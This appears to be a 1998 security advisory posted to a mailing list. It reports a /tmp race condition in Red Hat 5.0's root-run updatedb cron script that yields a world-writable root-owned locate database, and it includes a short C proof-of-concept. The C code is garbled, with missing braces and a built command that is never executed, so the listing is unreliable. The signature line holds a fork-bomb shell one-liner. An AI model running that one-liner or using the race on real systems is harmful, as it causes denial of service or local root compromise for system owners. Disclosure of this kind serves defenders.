"patched" updatedb with RH 5.0 - root compromise

Michal Zalewski (lcamtuf@BOSS.STASZIC.WAW.PL)
Fri, 06 Mar 1998 20:44:47 +0100

As an addendum to updatedb/sort bug - there's another vunerability
in this program. On my RH 5.0 it's launched every day from crontab's
script as nobody. Unfortunately, that setuid trick doesn't fix
anything. /etc/cron.daily/updatedb.cron (as root) creates temporary
file in /tmp using mktemp:

TMPFILE=`/bin/mktemp /tmp/locatedb.XXXXXX`
chown nobody.nobody $TMPFILE

That's mostly harmless. But after all, /usr/bin/updatedb is launched
via su -c. Hopefully, it will create /tmp/locatedb.XXXXXX.n file, but
there's no any error checking... Script simply moves that output file
(without checking permission nor ownership) to /var/lib/locatedb:

if [ -f $TMPFILE.n ] ; then
mv $SFILE /var/lib/locatedb [...]
chown root.root /var/lib/locatedb [...]

Because this script is running as root (!) and it's extremally
unsafe, you may perform simple tricky race condition. Here's simple
so-called "exploit":

#include <dirent.h>
#define STR "locatedb"
char buf[1024];
int infect(struct dirent *s) {
  if ((strncmp(STR,s->d_name,strlen(STR))!=0)) return -1;
  sprintf(buf,"touch %s.n",s->d_name);
  return -1;
int foo(struct dirent **a,struct dirent **b) {}
int main(int argc, char* argv[])
  struct dirent **x;
  while (1) scandir("/tmp",&x,infect,foo);

Simple as only it can be. Our file (in this case empty one has been moved to /var/lib/locatedb... Hey, but permissions were NOT changed (666). So not we have an world-writable, root-owned file. Nice. But that's not all. Try filling it with junk (eg. a lot of 0s), then run 'locate' utility... It will cause segmentation fault. It's probably exploitable, and root/other users privledges may be compromised. Hopefully.


There's no simple fix. Bug is in updatedb itself (and it's file creation method). Updatedb "protected" by very foolish script... You may try changing /tmp to something more private inside the script, but it's only a workaround.

_______________________________________________________________________ Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl] Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch] =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=